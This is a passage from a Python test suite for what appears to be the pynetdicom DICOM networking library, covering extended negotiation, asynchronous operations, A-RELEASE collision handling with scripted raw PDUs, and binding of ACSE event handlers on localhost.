ext_neg.append(item)
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.4"
item.service_class_application_information = b"\x00\x02"
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_established
assert assoc.acceptor.sop_class_extended == {}
assoc.release()
scp.shutdown()
def test_req_response_sop_class_ext(self):
"""Test requestor response if response received."""
def handle(event):
return event.app_info
handlers = [(evt.EVT_SOP_EXTENDED, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
ext_neg = []
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.3"
item.service_class_application_information = b"\x00\x01"
ext_neg.append(item)
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.4"
item.service_class_application_information = b"\x00\x02"
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_established
rsp = assoc.acceptor.sop_class_extended
assert "1.2.3" in rsp
assert "1.2.4" in rsp
assert len(rsp) == 2
assert rsp["1.2.3"] == b"\x00\x01"
assert rsp["1.2.4"] == b"\x00\x02"
assoc.release()
scp.shutdown()
class TestSOPClassCommonExtendedNegotiation:
"""Tests for SOP Class Extended Negotiation."""
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_check_ext_no_req(self):
"""Test the default handler for evt.EVT_SOP_COMMON"""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {}
scp_assoc = scp.active_associations[0]
rsp = scp_assoc.acse._check_sop_class_common_extended()
assert rsp == {}
assoc.release()
scp.shutdown()
def test_check_ext_default(self):
"""Test the default handler implementation"""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": ("1.2.840.10008.4.2", []),
"1.2.3.1": ("1.2.840.10008.4.2", ["1.1.1", "1.4.2"]),
"1.2.3.4": ("1.2.111111", []),
"1.2.3.5": ("1.2.111111", ["1.2.4", "1.2.840.10008.1.1"]),
}
scp_assoc = scp.active_associations[0]
items = {}
for kk, vv in req.items():
item = SOPClassCommonExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_uid = vv[0]
item.related_general_sop_class_identification = vv[1]
items[kk] = item
rsp = scp_assoc.acse._check_sop_class_common_extended()
assert rsp == {}
assoc.release()
scp.shutdown()
def test_check_ext_user_implemented_none(self):
"""Test handler returning request"""
def handle(event):
return event.items
handlers = [(evt.EVT_SOP_COMMON, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": ("1.2.840.10008.4.2", []),
"1.2.3.1": ("1.2.840.10008.4.2", ["1.1.1", "1.4.2"]),
"1.2.3.4": ("1.2.111111", []),
"1.2.3.5": ("1.2.111111", ["1.2.4", "1.2.840.10008.1.1"]),
}
scp_assoc = scp.active_associations[0]
items = {}
for kk, vv in req.items():
item = SOPClassCommonExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_uid = vv[0]
item.related_general_sop_class_identification = vv[1]
items[kk] = item
scp_assoc.requestor.user_information.extend(items.values())
rsp = scp_assoc.acse._check_sop_class_common_extended()
assert rsp == items
assoc.release()
scp.shutdown()
def test_check_ext_bad_implemented_raises(self):
"""Test exception in handler"""
def handle(event):
raise ValueError
return event.items
handlers = [(evt.EVT_SOP_COMMON, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": ("1.2.840.10008.4.2", []),
"1.2.3.1": ("1.2.840.10008.4.2", ["1.1.1", "1.4.2"]),
"1.2.3.4": ("1.2.111111", []),
"1.2.3.5": ("1.2.111111", ["1.2.4", "1.2.840.10008.1.1"]),
}
scp_assoc = scp.active_associations[0]
items = {}
for kk, vv in req.items():
item = SOPClassCommonExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_uid = vv[0]
item.related_general_sop_class_identification = vv[1]
items[kk] = item
scp_assoc.requestor.user_information.extend(items.values())
rsp = scp_assoc.acse._check_sop_class_common_extended()
assert rsp == {}
assoc.release()
scp.shutdown()
def test_check_ext_bad_implemented_type(self):
"""Test bad type returned by handler"""
def handle(event):
return b"\x00\x01"
handlers = [(evt.EVT_SOP_COMMON, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": ("1.2.840.10008.4.2", []),
"1.2.3.1": ("1.2.840.10008.4.2", ["1.1.1", "1.4.2"]),
"1.2.3.4": ("1.2.111111", []),
"1.2.3.5": ("1.2.111111", ["1.2.4", "1.2.840.10008.1.1"]),
}
scp_assoc = scp.active_associations[0]
items = {}
for kk, vv in req.items():
item = SOPClassCommonExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_uid = vv[0]
item.related_general_sop_class_identification = vv[1]
items[kk] = item
scp_assoc.requestor.user_information.extend(items.values())
rsp = scp_assoc.acse._check_sop_class_common_extended()
assert rsp == {}
assoc.release()
scp.shutdown()
def test_functional_no_response(self):
"""Test a functional workflow with no response."""
def handle(event):
return {}
handlers = [(evt.EVT_SOP_COMMON, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
req = {
"1.2.3": ("1.2.840.10008.4.2", []),
"1.2.3.1": ("1.2.840.10008.4.2", ["1.1.1", "1.4.2"]),
"1.2.3.4": ("1.2.111111", []),
"1.2.3.5": ("1.2.111111", ["1.2.4", "1.2.840.10008.1.1"]),
}
ext_neg = []
for kk, vv in req.items():
item = SOPClassCommonExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_uid = vv[0]
item.related_general_sop_class_identification = vv[1]
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_established
assert assoc.acceptor.accepted_common_extended == {}
scp_assoc = scp.active_associations[0]
assert scp_assoc.acceptor.accepted_common_extended == {}
assoc.release()
scp.shutdown()
def test_functional_response(self):
"""Test a functional workflow with response."""
def handle(event):
del event.items["1.2.3.1"]
return event.items
handlers = [(evt.EVT_SOP_COMMON, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
req = {
"1.2.3": ("1.2.840.10008.4.2", []),
"1.2.3.1": ("1.2.840.10008.4.2", ["1.1.1", "1.4.2"]),
"1.2.3.4": ("1.2.111111", []),
"1.2.3.5": ("1.2.111111", ["1.2.4", "1.2.840.10008.1.1"]),
}
ext_neg = []
for kk, vv in req.items():
item = SOPClassCommonExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_uid = vv[0]
item.related_general_sop_class_identification = vv[1]
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_established
scp_assoc = scp.active_associations[0]
acc = scp_assoc.acceptor.accepted_common_extended
assert len(acc) == 3
assert acc["1.2.3"] == req["1.2.3"]
assert acc["1.2.3.4"] == req["1.2.3.4"]
assert acc["1.2.3.5"] == req["1.2.3.5"]
assoc.release()
scp.shutdown()
class TestAsyncOpsNegotiation:
"""Tests for Asynchronous Operations Window Negotiation."""
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_check_async_no_req(self):
"""Test the default evt.EVT_ASYNC_OPS handler"""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
scp_assoc = scp.active_associations[0]
rsp = scp_assoc.acse._check_async_ops()
assert rsp is None
assoc.release()
scp.shutdown()
def test_check_user_implemented_none(self):
"""Test the response when user callback returns values."""
def handle(event):
return 1, 2
handlers = [(evt.EVT_ASYNC_OPS, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
scp_assoc = scp.active_associations[0]
rsp = scp_assoc.acse._check_async_ops()
assert isinstance(rsp, AsynchronousOperationsWindowNegotiation)
assert rsp.maximum_number_operations_invoked == 1
assert rsp.maximum_number_operations_performed == 1
assoc.release()
scp.shutdown()
def test_check_user_implemented_raises(self):
"""Test the response when the user callback raises exception."""
def handle(event):
raise ValueError
return 1, 2
handlers = [(evt.EVT_ASYNC_OPS, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
scp_assoc = scp.active_associations[0]
rsp = scp_assoc.acse._check_async_ops()
assert isinstance(rsp, AsynchronousOperationsWindowNegotiation)
assert rsp.maximum_number_operations_invoked == 1
assert rsp.maximum_number_operations_performed == 1
assoc.release()
scp.shutdown()
def test_req_response_reject(self):
"""Test requestor response if assoc rejected."""
def handle(event):
return 1, 2
handlers = [(evt.EVT_ASYNC_OPS, handle)]
self.ae = ae = AE()
ae.require_calling_aet = ["HAHA NOPE"]
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
ext_neg = []
item = AsynchronousOperationsWindowNegotiation()
item.maximum_number_operations_invoked = 0
item.maximum_number_operations_performed = 1
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_rejected
assert assoc.acceptor.asynchronous_operations == (1, 1)
assoc.release()
scp.shutdown()
def test_req_response_no_response(self):
"""Test requestor response if no response from acceptor."""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.acse_timeout = 5
ae.dimse_timeout = 5
ext_neg = []
item = AsynchronousOperationsWindowNegotiation()
item.maximum_number_operations_invoked = 0
item.maximum_number_operations_performed = 1
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_established
assert assoc.acceptor.asynchronous_operations == (1, 1)
assoc.release()
scp.shutdown()
def test_req_response_async(self):
"""Test requestor response if response received"""
def handle(event):
return event.invoked, event.performed
handlers = [(evt.EVT_ASYNC_OPS, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
ext_neg = []
item = AsynchronousOperationsWindowNegotiation()
item.maximum_number_operations_invoked = 0
item.maximum_number_operations_performed = 2
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_established
# Because pynetdicom doesn't support async ops this is always 1, 1
assert assoc.acceptor.asynchronous_operations == (1, 1)
assoc.release()
scp.shutdown()
class TestNegotiateRelease:
"""Tests for ACSE.negotiate_release."""
def setup(self):
"""Run prior to each test"""
self.scp = None
def teardown(self):
"""Clear any active threads"""
if self.scp:
self.scp.shutdown()
def create_assoc(self):
ae = AE()
ae.add_requested_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="requestor")
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = "ANY_SCU"
assoc.acceptor.address = "localhost"
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ""
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = ae.implementation_class_uid
assoc.requestor.implementation_version_name = ae.implementation_version_name
cx = build_context(Verification)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
return assoc
def create_assoc_acc(self):
# AF_INET: IPv4, SOCK_STREAM: TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVTIMEO, pack("ll", 1, 0))
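# The packed value is a struct timeval (seconds, microseconds), giving the
# raw socket a 1 second receive timeout on POSIX platforms.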
sock.connect(("localhost", 11112))
ae = AE()
ae.add_supported_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="acceptor")
assoc.set_socket(AssociationSocket(assoc, client_socket=sock))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = "ANY_SCU"
assoc.acceptor.address = "localhost"
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ""
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = ae.implementation_class_uid
assoc.requestor.implementation_version_name = ae.implementation_version_name
cx = build_context(Verification)
cx.context_id = 1
assoc.acceptor.supported_contexts = [cx]
return assoc
def start_server(self, commands):
"""Start the receiving server."""
server = ThreadedParrot(("localhost", 11112), commands, ParrotRequest)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
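# The parrot server simply replays the scripted command list: ("send", pdu)
# writes the raw PDU bytes to the peer, while ("recv", None) reads whatever
# the association under test sends next and stores it in server.received.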
def test_collision_req(self, caplog):
"""Test a simulated A-RELEASE collision on the requestor side."""
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None), # a-release-rq
("send", a_release_rq), # Cause collision
("recv", None), # a-release-rp
("send", a_release_rp),
]
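# Scripted release collision: the requestor's A-RELEASE-RQ crosses the peer's
# A-RELEASE-RQ, so the requestor replies with A-RELEASE-RP and then waits for
# the peer's A-RELEASE-RP, matching the send/recv sequence above.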
self.scp = scp = self.start_server(commands)
with caplog.at_level(logging.DEBUG, logger="pynetdicom"):
assoc = self.create_assoc()
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
assoc.release()
assert assoc.is_released
assert "An A-RELEASE collision has occurred" in caplog.text
scp.shutdown()
assert scp.received[1] == a_release_rq
assert scp.received[2] == a_release_rp
def test_release_no_response(self):
"""Test a requestor aborts if no response."""
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None), # a-release-rq
("recv", None), # a-p-abort
]
self.scp = scp = self.start_server(commands)
assoc = self.create_assoc()
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
assoc.release()
assert assoc.is_aborted
scp.shutdown()
assert scp.received[1] == a_release_rq
assert scp.received[2] == a_p_abort[:-1] + b"\x00"
def test_release_p_data(self, caplog):
"""Test receiving P-DATA-TF after release."""
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None), # a_release_rq
("send", p_data_tf),
("send", a_release_rp),
]
self.scp = scp = self.start_server(commands)
assoc = self.create_assoc()
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
with caplog.at_level(logging.DEBUG, logger="pynetdicom"):
assoc.release()
assert assoc.is_released
assert (
"P-DATA received after Association release, data has been lost"
) in caplog.text
scp.shutdown()
assert scp.received[1] == a_release_rq
def test_coll_acc(self, caplog):
"""Test a simulated A-RELEASE collision on the acceptor side."""
def handle(event):
event.assoc._is_paused = True
event.assoc.release()
return 0x0000
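# Releasing from inside the C-ECHO handler makes the acceptor issue its own
# A-RELEASE-RQ while the peer's release is in flight, manufacturing the
# collision; _is_paused is set first, presumably so the reactor doesn't keep
# consuming PDUs while the handler drives the release.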
# C-ECHO-RQ
# 80 total length
p_data_tf = (
b"\x04\x00\x00\x00\x00\x4a" # P-DATA-TF 74
b"\x00\x00\x00\x46\x01" # PDV Item 70
b"\x03" # PDV: 2 -> 69
b"\x00\x00\x00\x00\x04\x00\x00\x00\x42\x00\x00\x00" # 12 Command Group Length
b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x31\x00" # 26
b"\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00" # 10 Command Field
b"\x00\x00\x10\x01\x02\x00\x00\x00\x01\x00" # 10 Message ID
b"\x00\x00\x00\x08\x02\x00\x00\x00\x01\x01" # 10 Command Data Set Type
)
commands = [
("send", a_associate_rq),
("recv", None),
("send", p_data_tf),
("recv", None), # a_release_rq
("send", a_release_rq),
("send", a_release_rp),
("recv", None), # a_release_rp
]
self.scp = scu = self.start_server(commands) # Requestor
with caplog.at_level(logging.DEBUG, logger="pynetdicom"):
assoc = self.create_assoc_acc() # Acceptor
assoc.bind(evt.EVT_C_ECHO, handle)
assoc.start()
time.sleep(0.5)
assert "An A-RELEASE collision has occurred" in caplog.text
assert assoc.is_released
scu.shutdown()
assert scu.received[1] == a_release_rq
assert scu.received[2] == a_release_rp
def test_collision_req_abort(self, caplog):
"""Test release collision with acceptor abort."""
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None), # a-release-rq
("send", a_release_rq), # Cause collision
("recv", None), # a-release-rp
("send", a_abort),
]
self.scp = scp = self.start_server(commands)
with caplog.at_level(logging.DEBUG, logger="pynetdicom"):
assoc = self.create_assoc()
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
assoc.release()
assert assoc.is_aborted
assert "An A-RELEASE collision has occurred" in caplog.text
scp.shutdown()
assert scp.received[1] == a_release_rq
assert scp.received[2] == a_release_rp
def test_collision_req_ap_abort(self, caplog):
"""Test release collision with acceptor abort."""
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None), # a-release-rq
("send", a_release_rq), # Cause collision
("recv", None), # a-release-rp
("send", a_p_abort),
]
self.scp = scp = self.start_server(commands)
with caplog.at_level(logging.DEBUG, logger="pynetdicom"):
assoc = self.create_assoc()
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
assoc.release()
assert assoc.is_aborted
assert "An A-RELEASE collision has occurred" in caplog.text
scp.shutdown()
assert scp.received[1] == a_release_rq
assert scp.received[2] == a_release_rp
class TestEventHandlingAcceptor:
"""Test the transport events and handling as acceptor."""
def setup(self):
self.ae = None
_config.LOG_HANDLER_LEVEL = "none"
def teardown(self):
if self.ae:
self.ae.shutdown()
_config.LOG_HANDLER_LEVEL = "standard"
def test_no_handlers(self):
"""Test with no transport event handlers bound."""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == []
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == []
assert child.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.release()
scp.shutdown()
def test_acse_sent(self):
"""Test binding to EVT_ACSE_SENT."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
assoc.send_c_echo()
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 2
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert event.event.name == "EVT_ACSE_SENT"
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
assert isinstance(triggered[1].primitive, A_RELEASE)
assert triggered[0].primitive.result == 0x00 ## A-ASSOCIATE (accept)
assert triggered[1].primitive.result is not None ## A-RELEASE (response)
scp.shutdown()
def test_acse_sent_bind(self):
"""Test binding to EVT_ACSE_SENT."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.send_c_echo(msg_id=12)
scp.bind(evt.EVT_ACSE_SENT, handle)
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
assoc.send_c_echo(msg_id=21)
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 1
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert event.event.name == "EVT_ACSE_SENT"
assert isinstance(triggered[0].primitive, A_RELEASE)
scp.shutdown()
def test_acse_sent_unbind(self):
"""Test unbinding EVT_ACSE_SENT."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.send_c_echo(msg_id=12)
scp.unbind(evt.EVT_ACSE_SENT, handle)
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.send_c_echo(msg_id=21)
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 1
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert event.event.name == "EVT_ACSE_SENT"
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
scp.shutdown()
def test_acse_sent_raises(self, caplog):
"""Test the handler for EVT_ACSE_SENT raising exception."""
def handle(event):
raise NotImplementedError("Exception description")
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
with caplog.at_level(logging.ERROR, logger="pynetdicom"):
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.send_c_echo()
assoc.release()
while scp.active_associations:
time.sleep(0.05)
scp.shutdown()
msg = (
"Exception raised in user's 'evt.EVT_ACSE_SENT' event handler"
" 'handle'"
)
assert msg in caplog.text
assert "Exception description" in caplog.text
def test_acse_recv(self):
"""Test starting bound to EVT_ACSE_RECV."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_RECV, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
assoc.send_c_echo()
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 2
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
assert isinstance(triggered[1].primitive, A_RELEASE)
assert event.event.name == "EVT_ACSE_RECV"
assert triggered[0].primitive.result is None ## A-ASSOCIATE (request)
assert triggered[1].primitive.result is None ## A-RELEASE (request)
scp.shutdown()
def test_acse_recv_bind(self):
"""Test binding to EVT_ACSE_RECV."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert len(scp.active_associations) == 1
assoc.send_c_echo(msg_id=12)
scp.bind(evt.EVT_ACSE_RECV, handle)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
assoc.send_c_echo(msg_id=21)
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 1
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert isinstance(triggered[0].primitive, A_RELEASE)
assert event.event.name == "EVT_ACSE_RECV"
scp.shutdown()
def test_acse_recv_unbind(self):
"""Test unbinding to EVT_ACSE_RECV."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_RECV, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert len(scp.active_associations) == 1
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
assoc.send_c_echo(msg_id=12)
scp.unbind(evt.EVT_ACSE_RECV, handle)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == []
assoc.send_c_echo(msg_id=21)
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 1
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
assert event.event.name == "EVT_ACSE_RECV"
scp.shutdown()
def test_acse_recv_raises(self, caplog):
"""Test the handler for EVT_ACSE_RECV raising exception."""
def handle(event):
raise NotImplementedError("Exception description")
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_RECV, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
with caplog.at_level(logging.ERROR, logger="pynetdicom"):
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.send_c_echo()
assoc.release()
while scp.active_associations:
time.sleep(0.05)
scp.shutdown()
msg = (
"Exception raised in user's 'evt.EVT_ACSE_RECV' event handler"
" 'handle'"
)
assert msg in caplog.text
assert "Exception description" in caplog.text
class TestEventHandlingRequestor:
"""Test the transport events and handling as requestor."""
def setup(self):
self.ae = None
_config.LOG_HANDLER_LEVEL = "none"
def teardown(self):
if self.ae:
self.ae.shutdown()
_config.LOG_HANDLER_LEVEL = "standard"
def test_no_handlers(self):
"""Test with no transport event handlers bound."""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == []
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == []
